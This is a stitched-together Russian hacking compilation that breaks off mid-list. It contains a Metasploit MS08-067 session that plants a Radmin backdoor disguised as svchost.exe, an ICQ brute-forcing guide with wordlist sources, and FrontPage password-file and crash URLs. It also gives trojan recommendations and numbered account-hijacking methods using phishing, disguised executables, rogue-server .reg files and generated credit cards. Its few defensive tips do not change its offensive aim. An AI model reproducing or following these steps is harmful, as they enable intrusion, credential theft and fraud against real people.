http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG

Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG

адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG

Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG

Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG

Необходимый софт:
ФТП — сервер (Serv -U)
Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG

IP адресс 192.168.1.3
Маска подсети 255.255.255.0
Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG

Настраиваем следующим образом:
IP адресс 192.168.1.10
Маска подсети 255.255.255.0
Основной шлюз 192.168.1.3
Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG

#ПРИМЕР.#
Необходимый софт:
Metasploit 3.2
Radmin Viewer 3
RadminServer (спец. Сборка)
Сканим комп xspider’ом

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG

Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG

use windows/smb/ms08_067_netapi ; наш сплоит
set PAYLOAD generic/shell_bind_tcp ; выбираем начинку
PAYLOAD => generic/shell_bind_tcp
set RHOST 192.168.1.10 ; хост-жертва
RHOST => 192.168.1.10
set LPORT 7777 ; локальный порт
LPORT => 7777
set RPORT 445 ; удаленный порт
RPORT => 445
exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 3 — lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability…
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)
Microsoft Windows XP [‚?aa?i 5.1.2600]
(‘) S®a?®a ??i ? ©?a®a®aa, 1985-2001.
C:WINDOWSsystem32>
Получили командную строку на удаленной системе
{создаем в папке windows, папку helps}
cd c:windows
mkdir helps
{коннектимся к нашему компу}
ftp192.168.1.3
Пользователь (192.168.1.3:(none)): kerny
{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}
cd c:kerny
dir
{файлы радмина}
drw-rw-rw- 1 user group 0 Mar 2 20:10 .
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe
{сливаем файлы на комп жертвы в папку windowshelps}
get 111.bat c:windowshelps111.bat
get 111.reg c:windowshelps111.reg
get AdmDll.dll c:windowshelpsAdmDll.dll
get raddrv.dll c:windowshelpsraddrv.dll
get svchost.exe c:windowshelpssvchost.exe
{отключаемся от нашего фтп}
bye
{идем в папку, и проверяем скачались ли файлы}
cd c:windowshelps
dir
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe
{устанавливаем Radmin у жертвы}
111.bat

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_weqnkS1I/AAAAAAAAACc/de-qr4zW1Xo/s400/14.JPG

Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.

http://2.bp.blogspot.com/_oxXdxKIGwp0/Sa_wqRwzH3I/AAAAAAAAACk/A7Xi7UIkWaE/s400/15.JPG

Снял видео, там же и статья отформатированная в pdf:

http://ifolder.ru/10884195

http://kerny-auroras.blogspot.com/2009/03/windows.html

http://virtyworld.ru/load/6-1-0-34

( google вам в помощ)
Открываем IPDBrute. Жмем Config — там выставляем полные адресы к файлам.
source — наш source — оттуда брутфорсер наш будет читать к какому уину подбирать какой пароль.
damp incorrect — сюда будут сохраняться неверные пары UIN;password
damp correct — сюда будут сохраняться ВЕРНЫЕ пары UIN;password
proxies list — тут будут читаться прокси.
Threads — количество потоков. Это определяет кол-во потоков, в которые будет работать программа. Выбирайте сами, я работаю по 500.
Cleanip every — время в минутах, через которое будут перепроверяться прокси и убираться «дохлые». Автомат — 30.
Change user details -менять ли инфо юзера автоматически.
Change passwords — менять ли пароль юзера автоматически.
Жмем START и ждем… можно раз в два часа подходить к компьютеру и веселиться, видя сколько уинов уже попалось, или же пускать скупую слезу, видя на строчку bad: МНОГО_ТЫСЯЧ, good: 0.
Откуда брать словари для брута

http://www.passwords.ru/dic.htm

ftp://ftp.openwall.com/pub/wordlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
ftp://ftp.ox.ac.uk/pub/wordlists/
ftp://ftp.funet.fi/pub/unix/security/dictionaries/

http://www.outpost9.com/files/WordLists.html

http://www.phreak.com/html/wordlists.shtml

ftp://coast.cs.purdue.edu/pub/dict/wordlists/

http://www.securitylab.ru/forum/read.php?FID=2

http://www.zlob-porno-portal.com/…./Windows/Lamo.pwl

Такой урл позволяет слить файл Lamo.pwl. И так далее со всеми «чувствительными» файлами! Данный баг замечен на системах с Frontpage-PWS32/3.0.2.926, а также некоторых других.
2) Довольно часто на Frontpage сервер стаят расширения pwd или grp, позволяющие администратору или вебдизайнеру удаленно закачивать на сервер файлы. Эти дополнения позволяют хакеру получить контроль чуть-ли не над всем сервером. Все файлы, которыми может воспользоваться хакер, лежат в системной директории Frontpage, а именно, в /_vti_pvt. Эта папка находится в корневой директории сервера. Каждая папка, куда есть доступ посредством Microsoft FrontPage, имеет уникальные права на доступ, и пароли, их определяющие находятся в файлах service.pwd и service.grp. Также можно встретить следующие файлы:
administrators.pwd — для администраторов
authors.pwd — для авторов закачиваемых страниц
users.pwd — для обычных пользователей
В них тоже содержаться пароли
Расширения ФронтПаги создают резервную копию каждого редактируемого файла. Если тв найдешь подобный сайт, прото — поищи в любой директории папку _vti_cnf — вы получите полный список файлов в ней. Скачав любой *.pwd файл, ты увидишь что-то вроде: User:7JyxuUUYY9sgQ. Это всем нам знакомый DES — так что переписывай его в формат 7JyxuUUYY9sgQ:10:200:User:/users/User:/bin/bash и кормите этим очередного btuteforce cracker’a типа Johna the ripper’a или Shadow Crack`a.
Пример файла users.pwd:
# -FrontPage-
jmitchel:7JyxuUUYY9sgQ
wolfe:70yTVencjVNUs
cwolfe:7hT30qItX/v2s
3) Надеюсь, никто не будет спорить, что Microsoft Frontpage — это в первую очередь не веб-сервер, а комплект для разработки и создания сайтов. Наверное, многие из вас, кто занимался дизигном, сталкивались с термином map, т.е. разметка какой-то части рисунка на чуствительные области, например, гиперссылки. Разработчики компании Microsoft включили в свой Frontpage две утилиты, облегчающие жизнь дизайнеру, но довольно-таки сильно затрудняющие жизнь админа: htimage.exe и imagemap.exe. Эти файлы обычно можно найти или в директории /scripts или в /cgi-bin.
Примерное таким способом их и используют:

http://target/path/htimage.exe/mapname?x,y

При запросе с сервера части этой карты (map) диной свыше 741 символа http://target/path/htimage.exe/?0,0 — FrontPage зависает и перестает работать, в отличии от операционной системы. При этом возможно удаленно обратится к регистру EIP на сервере и это делает вполне возможным исполнение удаленно произвольного кода.
Эти поистине многофункциональные утилиты облегчают хакеру еще одну задачу — выяснение расположения Frontpage на сервере. Это возможно, благодаря тому, что при GET запросе к htimage.exe может вернуться путь, показывающий структуру диска.
Для примера:
http://target/cgi-bin/htimage.exe?2.2 может вернуть скажем такой резульатат:
E:websitecgi.
UKR-XЫР:»….Здесь я, пожалуй, сделаю небольшое лирическое отступление и покажу структуру Frontpage сервера на примере установки его на Windows NT:
Полный путь:
Путь в броузере:
C:InetPubwwwroot
C:InetPubscripts
/Scripts
C:InetPubftproot
C:InetPubwwwroot_vti_bin
/_vti_bin
C:InetPubwwwroot_vti_bin_vti_adm
/_vti_bin/_vti_adm
C:InetPubwwwroot_vti_bin_vti_aut
/_vti_bin/_vti_aut
C:InetPubcgi-bin
/cgi-bin
C:InetPubwwwrootsrchadm
/srchadm
C:WINNTSystem32inetserviisadmin
/iisadmin
C:InetPubwwwroot_vti_pvt….»
4) Рассмотрим следующие файлы ФП: shtml.exe или shtml.dll (в зависимости от операционной системы, установленной на серваке). При попытке открыть с помощью этих вайлов некие несуществующие файлы (html, htm, asp или shtml) на сервере произойдет ошибка и он выдаст сообщение, в котором укажет полный путь к корневой директории сервера. Для примера, выполним запрос:
http://target/_vti_bin/shtml.dll/non_existant_file.html и в ответ вы увидите примерно следующее:
«Cannot open «C:localpath on_existant_file.html»: no such file or folder» Примеры запросов:

http://target/_vti_bin/shtml.exe/non-existent-file.html

http://target/_vti_bin/shtml.exe/non-existent-file.htm

http://target/_vti_bin/shtml.exe/non-existent-file.shtml

http://target/_vti_bin/shtml.exe/non-existent-file.asp

5) С фронтПагой в стандартном комплекте поставляется каунтер(типа счетчик посещений), находится он здесь :/scripts/fpcount.exe. Хотя бы один такой счетчик может подвесить весь сервер! Использование:
Данный счетчик выполняется с параметрами:
fpcount.exe?Page=default.htm|Image=3|Digits=6.
Т.е. http://www.zlop-porno-portal.com/scripts/fpcount.exe?Page=default.htm|Image=3|Digits=6 Интерес представляет последний параметр — количество разрядов. Попросив счетчик показать, к примеру, 32767 цифр вы получите переполнение буфера и запуск доктор ватсона (или другого отладчика, запущенного по умолчанию), который отожрет примерто 4 мегабайта памяти на сервере. Заставив сервер выполнить такой вопрос 20-30 раз(зависит от тачки), вы забъете всю память на атакуемом компе и в следующий раз свалится уже не fpcount.exe, а сам Internet Information Server. Итак, «смертельный» URL -
http://www.zlob-porno-portal.com/scripts/fpcount.exe?Page=default.htm|Image=3|Digits=99999, где www.zlob-porno-portal.com — URK жертвы. 5) Каким макаром?
Найти сервак на ФронтПаге очень просто! Идешь на www.altavista.com и и задаешь для поиска строку /_vti_pvt. Далее перебирай все найденные ссылки и ищи сайты,на которых стоит Front Page со всеобщим обозрением фалов паролей.
З.Ы. Сайт http://www.zlob-porno-portal.com использовался как домен жертвы, а не как мой порно сервер:). Кстати хорошая идея…
З.Ы.Ы. Благодарности за помощь в создании статьи объявляются следующим перцам: UkR-XblP, cluz, группа GIN.

Какие интересные ссылки подкинешь?
К наиболее интересным и информативным сайтам я могу отнести:

http://www.asechka.ru

http://www.iseekyou.ru

http://www.icqinfo.ru

Наиболее большими форумы по ICQ-хакингу являются:

http://forum.web-hack.ru

http://forum.asechka.ru

Сайты с интересным софтом:

http://www.cobans.net

http://www.ifud.ru

http://www.mirabiliz.com

http://www.icqz.net

Сервисы от ICQ:
http://www.icqmail.com — почтовый ящик вида @icqmail.com
http://home.icq.com — хостинг на 20Mb с доменам вида name.home.icq.com
Также через любой поисковик можно найти много других более мелких сайтов по ICQ и шопов.

Какой пароль посоветуешь использовать?
Пароль необходимо задавать такого типа — zWqT_oG2 (чувствительный к регистру, с цифрами и желательно со спецсимволами). Так же я рекомендую менять пароль раз в месяц. Большинство людей занимающихся кражей пароля по методу его подбора (брутфорс) обычно используют для подбора словарные слова (типа: admin, password, god, sex и т.д.). Например, админский номер мираблов 88888, был украден методом подбора пароля (паролем оказалось еврейское имя), к сожалению через несколько дней аська была возвращена владельцу. Очень важно как можно чаще менять пароль т.к. хоть и на подбор пароля типа U#S$r.^H могут уйти месяцы, но мне известны случаи, когда создавался словарь восьмизначных паролей типа >AB>F%uq и примерно за месяц брута (на выделенке) номер угонялся.
Я бы посоветовал генерировать пароли утилитой Password Generator (http://www.web-hack.ru/download/info.php?go=26), если у вас нет возможности ею воспользоваться, то вы можете зайти на страницу генерации пароля в On-Line (написанную мною) — http://www.web-hack.ru/tools/pasgen.php .
Я слышал о многострочных паролях, что это такое?
Несколько лет назад эта тема была очень актуальна, но в 2003 году эту лазейку закрыли. Фишка заключалась в том, что в пароле указывался символ переноса каретки на одну (и более) строк вниз и пароль на мыло приходил в совершенно непонятно видел для незнающего человека (первое время многострочные пароли вообще не приходили). Получалось так: что как бы и примари у хозяина, и он может выслать на него пароль но не может, почему пароль не принимает сервер. Видимо в 2003 суппортам icq.com надоело принимать письма с просьбой помочь со сменой многострочного пароля и администрация сделала финт ушами: теперь если в пароле используются спецсимволы, то в письме высылаемом при восстановлении пароля вкладывается специальная сгенерированная ссылка (резет-линк), при заходе на которую, на номере автоматически меняется пароль который генерируется сервером. Резет-линк остается действительным в течение одного дня, после высылки пароля. Таким образом, можно защищаться от кидал, делая резет-линк и отдавая пароль от ICQ (если ася без примака). И если вас решат кинуть, то просто зайдите по ссылки и смените пароль

Как скрыть IP-адрес?
Одним из важных моментов защиты вашего компьютера и уина (uin) от взлома является — скрытие вашего IP. Стандартный клиент ICQ уже давно по умолчанию скрывает ваш IP (проверьте на всякий случай: заходим в Security & Privacy Permissions, потом в Peer To Peer Connection ставим Allow Peer To Peer Connection with any user upon your authorization). Однако во многих альтернативных клиентах по умолчанию отключена возможность скрывать IP. В Миранде установить скрытие IP можно так: Настройки\Сеть\ICQ Privacy\Прямые соединения только с авторизированными пользователями.

Можно ли через веб сменить пароль и изменить инфу в асе?
Когда то давно пароль можно было сменить через сайт www.icq.com , но в связи с дырой найденными в этой системе (это было очень давно) администрация решила убрать возможность смены пароля. И теперь вы можете сменить лишь личную информацию по ссылке — http://web.icq.com/whitepages/login/ .

Как можно оживить асю из анрега, а то я слышал о какой то проге?
Анрег — это когда по причине, каких то нарушений пользования сервисом ICQ, его администрация удаляет (блокирует) ваш номер ICQ. Анрегнутые номера это такие, которые в поиске не ищутся (хотя бывает, когда и не анрегнутые аси не ищутся через поиск). Оживить эти номера могут ТОЛЬКО админы ICQ (ну или хакеры, знающие какие ни будь дыры в сервисе ICQ). Если вы увидите в инете программу, которая якобы оживляет анрегнутые (удаленные) номера, то не поддавайтесь на развод, в 99,99% случаем это троян!

Как защитить асю от кражи?
В выше написанном тексте были описаны все способы защититься от крыжи uin`а. Однако я подведу кратко общий итог:
1) Необходимо владеть Primary E-mail`ом
2) Ставьте сложные пароли и как можно чаще меняйте их
3) Скрывайте свой IP
4) Из общих советов безопасности могу посоветовать: чаще обновлять базу антивируса и проверять им все программы скаченные из инета, установите FireWall, не скачивайте программы с сомнительных сайтов, не пускайте никого за свой комп и не поддавайтесь на социальную инженерию.

Я слышал, что у кого-то есть десятизначка, такое может быть?
Да, но десятизначные номера являются лишь зеркалом уже существующих номеров. Этот секрет довольно старый и заключается в том, что надо прибавлять к любому номеру — число 4294967296. Например, если у вас номер 123456, то прибавив к нему 4294967296 мы получаем номер 4295090752. Это число можно прибавлять, прибавлять и еще раз прибавлять (хоть до 15-и знака — 495948463727168) и всегда попадать через поиск на номер 123456. Для генерации зеркал вашей аси существует программа — FakeUIN.

Что такое ася-неведимка?
Данное понятие появилось в середине 2004 года, когда мираблы сделали нововведение, которое заключается в том, что номера которые имеют пустую инфу и/или долго не использовались, не ищутся в поиске. Создается иллюзия, что номера находятся в анреге. Стандартными клиентами эти номера нельзя добавить в контакт. Но эти номера являются полностью работоспособными: в них можно логиниться (только с ICQ Lite и ICQ 2003 Pro Build 3916, иначе номер сразу же появятся в поиске), принимать/отправлять сообщения, но ни в коем случае нельзя менять инфу, иначе они так же станут видимыми.

========
HackSoft
========
Я скачал программу а она не заработала, а еще вскоре мою асю угнали. В чем дело?
В последнее время развелось очень много троянов ворующих ваши пароли В большинстве случаев это софт связанный со сменой пароля или определения IP-адреса, кстати, в большинстве случаем попадаются и работоспособные варианты программ крадущие ваш пароль Совет: скачивайте программы с проверенных сайтов (а не с сомнительных) или проверяйте трафик от работы программы сниффером.

Как определить IP-адрес человека в аське?
Наиболее популярной программой для определения IP-адреса является uin2ip, но в инете развелось на столько много троянов, которые представляются или зашиваются в эту прогу, что я посоветовал бы программу Show ICQ IP (http://www.web-hack.ru/download/info.php?go=105), которую написал inf специально для нашего сайта. Кстати, такой клиент, как Miranda тоже умеет определять IP (для определения откройте в профиле нужного номер вкладку «ICQ»). IP определяется лишь у старых версий ась, таких как icq2000a/b,2001a. Сейчас IP может быть показан только в том случае если юзер забыл, поставить запрет на показ IP всем в настройках аси или любого другого клона. В некоторых случаях можно узнать IP также если вы находитесь в контакт листе пользователя которого вы проверяете на открытый IP, что конечно же маловероятно.
C выходом новой ветки (возможно на момент чтения вами этой статьи, этот тип клиентов будет уже и очень даже старым =) ICQ-клиентов — ICQLite и Xtraz, стало возможным определять IP (а иногда и порт) безо всякого труда. Для этой цели можно использовать утилиту — ICQLite IP-Xtraz (by inf) — http://inf.icqz.net/progs/ipxtraz.zip

Какой брутфорс лучший?
За все время существования сети ICQ было написано много брутфорсов, но некоторые уже не работают, а некоторые слишком медленные. Наиболее удобным и быстрым на сегодняшний день является IPDbrute (http://www.web-hack.ru/download/info.php?go=46).

А какие брутфорсы есть под *nix?
К сожалению, под *nix`ы существует не так много хороших брутфорсов. Мне известен лишь два:
1) Скрипт на Perl который можно запустить на шелле. Его написал Forb — http://kamensk.lael.ru/forb/soft/icq.zip .
2) THC-Hydra (http://www.thc.org), который кроме ICQ-протокола умеет брутить и: FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL VNC, ICQ, Socks5, PCNFS, Cisco and more.
Если у вас имеется работающий брутфорс, то прошу поделиться.

Как наиболее легче менять пароль и изменять инфу?
Для этого есть очень популярная программа C4PassChanger (http://www.web-hack.ru/download/info.php?go=34). Кроме нее есть еще и много других, но не советую их качать с сомнительных сайтов, может так получиться, что в них трой и новый пароль улетает их автору.

Какие сканеры существуют?
Под сканерами в мире ICQ-хакинга понимаются программы для сбора личных сведений и примари мыл у пользователей ICQ. Очень популярной в свой время была программа Assault, но в 2003 году ее использование стало неэффектным, т.к. стало возможным делать запрос на поиск с одного номера всего 200 ась. Проблема решается юзанием большого списка ась, через которых будет проходить сканирование. Наиболее хорошей программой в настоящее время является Ba!amut ICQ Spider (http://spszone.com), но к сожалению она не умеет сканить по диапазону ась.

Какой троян посоветуешь для кражи паролей от аси?
Очень хорошим трояном, которые крадет пароли от основных мессенджеров ICQ (ICQ99b-2003a/2003b/Lite, Miranda-icq, Trillian ICQ&AIM, &RQ и многих других программ) является Pinch (http://www.web-hack.ru/download/info.php?go=49). Есть еще один интересный (платный) троян A-311 Death (http://www.prodexteam.net/a311.htm). Конечно, существует много и других трое крадущих пароли от ICQ.
Почему у меня не работает программа автоматической высылки пароля на мыло?
В конце 2003 года из-за эксплоита написанного человеком с ником coban2k, который позволял на ЛЮБОЕ мыло высылать, через сервис восстановления пароля, сколько угодно флуда. Вскоре администрация icq.com прикрыла эту дыру + теперь при восстановлении пароля (https://web.icq.com/secure/password) требуется ввести слово с картинки (метод «кэпч»). Следовательно, все программы связанные с высылкой пароля через этот сервис ушли в небытие.

Способ #3
Этот способ требует значительных усилий и основан на том, что многие люди используют в качестве пароля какое-нибудь легковычисляемое слово, например свой ник или имя. Запустите ICQ. Выберите меню Add/Find users. Теперь выберите Main search/Search by ICQ number (UIN). Введите номер, который вы хотите получить. Жмите Info. Запомните Uin, ник, настояшее имя пользователя и другие детали. Нажмите на значок ICQ и выберите Add/Change Current User. Жмите Add another registered user, Next, Next. Теперь вводите UIN, а в качестве пароля — ник, имя или какую-то другую относящуюся к данному пользователю информацию. Вполне возможно, что вам повезёт. Вообще говоря, существует также целый ряд паролей, особенно «любимых» малоопытными пользователями, например «Password», «qwerty», «12345″ и т.д. Хотя подбор паролей — это тема отдельной статьи, и мы не будем здесь подробно на этом останавливаться.

Способ #4
Этот метод основан на том, что многие пользователи любят указывать почтовый ящик на несуществующих серверах. Примером могут служить ящики aaaaa@bbbbb.com. Для получения пароля этой аси вам достаточно, используя любую генерилку кредитных карточек, купить домен www.bbbbb.com и, когда он будет задействован, получить письмо с паролем. Единственное условие: к процессу регистрации домена нужно подходить с умом. Не везде вам позволят купить домен по несуществующей кредитке. Для этого я порекомендовал бы www.awc.net. Зарегистрированный там домен гарантированно просуществует пару недель — достаточный срок для получения письма.

Способ #5
Если почтовый ящик пользователя существует, и отобрать его никак не получается, можно попробовать его попросту взломать. Конечно, если этот ящик находится у провайдера пользователя, то сделать это будет не так уж и просто. Но если он находится на одном из бесплатных mail-серверов, внимательно следите за сообщениями о новообнаруженных «дырах»: если вам повезёт, вы узнаете способ доступа к интересующему вас почтовому ящику раньше, чем эта «дыра» будет закрыта. А дальше всё просто: вам достаточно забрать из ящика письмо с паролем раньше, чем его заметит владелец ящика. А в качестве примера подобного взлома прочтите эту статью.

Способ #6
Если почтовый ящик защищён хорошо, и взломать его нельзя, можно попробовать получить его пароль. Дело в том, что людям свойственно забывать многие полезные вещи, в том числе и пароли. Поэтому у любой службы бесплатных почтовых ящиков есть некий механизм, с помощью которого можно восстановить «забытый» пароль. При этом вам придётся подтвердить, что вы и есть хозяин того самого ящика. Как правило, для этого необходимо знать краткую информацию о пользователе, такую как имя, фамилия, дата рождения, адрес и т.д. Кроме того, почтовые службы практикуют следующий механизм: при регистрации пользователю предлагается сформулировать некий вопрос личного плана и дать на него ответ. Если потом пользователь заявит об утере пароля, ему будет задан этот вопрос, и если ответ совпадёт, это будет считаться подтверждением личности пользователя. Так вот, 90% пользователей используют вопросы типа «Как зовут мою собаку?», «Какая марка моего автомобиля?» и т.п., причём уже через год после регистрации они гарантированно не помнят, какой именно вопрос ими был указан. Поэтому, достаточно получасового общения по аське, чтобы как бы случайно сказать что-то вроде «Я очень люблю свою собаку! Она породы волкодав, кличка Дружок. А у тебя есть собака? А какой породы? А как её зовут?». Если правильно выбрать время и задать вопрос как бы между делом, пользователь наверняка ответит на него, ничего не заподозрив. Точно таким же образом можно узнать и всю остальную информацию, необходимую для получения «забытого» пароля, если, конечно, она не указана в пользовательских деталях ICQ. Если системы автоматического восстановления забытого пароля в данной почтовой службе нет, вам придётся написать слёзное письмо постмастеру, где необходимо будет указать всё те же данные о пользователе. Почтовые мастера — они люди добрые, они вам помогут.

Способ #7
Послание якобы от системного администратора (icq_admin@icq.com). Пользователь Алекс UIN 100001, занимается своими обычными делами в режиме онлайн. Он проверяет свой почтовый ящик и обнаруживает там письмо от системного администратора. В письме говорится о том, что ввиду наличия прорех в компьютерной безопасности, пароли пользователей будут теперь изменены: “Ваш новый пароль D4YIL”, — написано в полученном Алексом послании. Вы можете изменить его сами, прямо сейчас, чтобы не терять время и не подвергать себя опасности, или он вступит в силу через 30 минут после получения вами этого уведомления. He забудьте его! Не раскрывайте его никому! Компьютерная безопасность — очень важный аспект, которым нельзя пренебрегать! Затем вы жмете на ICQ «Add another registered user», вводите выбранный UIN и посланый вами пароль. Если Алекс поверил, то вы получите долгожданный UIN. Возможны и другие разновидности этого способа: например, можно написать подобное письмо, но с требованием установить в качестве Primary E-mail какой-либо адрес, выгядящий достаточно убедительно, но зарегистрированный на вас. Либо можно предложить пользователю внести в список серверов ICQ ip-адрес вашего сервера, мотивируя это перегруженностью сервера icq.mirabilis.com. Можно использовать и другие подходы к пользователю — здесь всё ограничено только вашей фантазией. «На ура» проходят также и письма «от постмастера» почтовой службы, которую использует жертва. Например, если почтовый ящик пользователя расположен у его провайдера, и он использует POP3-доступ, подойдёт письмо об изменении ip-адреса почтового сервера. Если жертва внесёт указанные вами изменения в настройки своей почтовой программы, то он сам выложит вам свой пароль, связавшись с любезно предоставленным вами подставным POP3-сервером.

Способ #8
Этот путь наиболее широко распространён. Берётся какой-либо свежий почтовый троянец — например, последняя версия Naebi Soseda, Stealth, Shtirliz, Hooker, GIP (работают под 95/98/NT). Используя Microangelo98 , у него меняется иконка на иконку от графического файла (или любую другую на ваше усмотрение), и сервер трояна после всех манипуляций переименовывается во что-то вроде «photo.jpg (куча пробелов) .exe». При передаче файла через ICQ будет видно только начало имени, и жертва так ничего и не заподозрит, пока не нажмёт на «open». Но тогда будет уже поздно. Обычно файл передаётся под видом фотографии после короткой беседы с жертвой. См. также FAQ по троянам на нашем сайте.

Способ #9
Если вы имеете представление о протоколах, по которым ICQ-клиент регистрируется на сервере при каждом подключении к сети, вы можете взять пароль непосредственно из перехваченного сетевого траффика. Для такого перехвата могут быть использованы различные способы. Если ваделец UINа находится в вашей локальной сети, вы можете применить сниффер . Если нет, попробуйте сделать так, чтобы он запустил на своём компьютере .reg-файл, содержащий (помимо полезных действий, например оптимизации файловой системы Windows) строки: [HKEY_CURRENT_USERSoftwareMirabilisICQDefaultPrefs] «Default Server Host»=»Имя или ip-адрес вашего сервера» На этом сервере вам необходимо будет выделить из траффика всю нужную вам информацию, а затем перенаправить его на icq.mirabilis.com. То же самое можно сделать, используюя «фальшивый» прокси-сервер. Кстати, на многих хакерских сайтах сейчас можно найти списки анонимных прокси-серверов. Многие пользователи, желая скрыть свой ip, пользуются их услугами, не подозревая, что часть этих серверов принадлежит весьма любопытным владельцам, а то и спецслужбам некоторых стран. Причина интереса спецслужб проста: раз уж человек желает анонимности, значит ему есть что скрывать. И не надо устанавливать дорогостоющую аппаратуру у всех Интернет-провайдеров, как это пытаются сейчас сделать в России. Достаточно контролировать несколько десятков «анонимных» прокси — и «клиент» сам себя выдаст! Причём вычислить такое «прослушивание» абсолютно невозможно — ведь прокси выглядит абсолютно надёжным и анонимным. В принципе, он и является анонимным. Почти для всех. Кроме владельца. Не того, кто указан в базе данных WhoIs, а НАСТОЯЩЕГО владельца.

Способ #10
Удаленный доступ к компьютеру. Данный метод подразумевает некоторые навыки общения с программами и методами, предоставляющими возможности удаленного доступа к компьютеру, на котором установлена аська с интересующим вас номером. Обычно для этих целей используется троянские кони Back Orifice, NetBus, Sub7 и др. Но они получили слишком широкое распространение и теперь обнаружиавются антивирусами. Так что ищите менее распространенный. Кроме того, возможно удалённое подключение к компьютеру жертвы через 139-й порт по протоколу NetBIOS. Очень часто ресурсы, доступные через этот порт, вообще не имеют пароля, а если этот пароль и присутствует, подбирать его намного быстрее и удобнее, чем, например, регистрационный пароль ICQ. Для этого существует огромное количество специализированных программ, наиболее популярная — Legion . Вам нужно всего лишь получить системные файлы аськи. А именно: «номер_аси.dat и номер_аси.idx» из каталога «c:program filesicqdb». Это если ася проинсталлирована в каталог по умолчанию. Остальные файлы для этого UIN-на вы сможете сфабриковать из аналогичных файлов любого другого номера. После этого, корректно изменив информацию в системном реестре, вы сможете сконнектиться под данным номером.

Способ #11
Можно ли изменить пассворд чужого ICQ аккаунта без получения доступа к компьютеру его владельца? Когда-то, во времена icq98, это было возможно. Существовала программа для взлома ICQ под названием «ICQhijeck» (или «ICQhijeek»). При наличии IP жертвы, его UINa и номера порта для связи с клиентом, ICQhijeck посылал spoofed пакет, заявляющий о себе, что пакет принадлежит самому клиенту и несет в себе задачу смены пассворда. Пассворд выбирал нападающий. В конце концов Mirabilis убрал этот баг, но вдруг вам повезёт, и вы найдёте юзера, который не обновлял своего ICQ-клиента в течение последних двух лет.. .

Способ #12
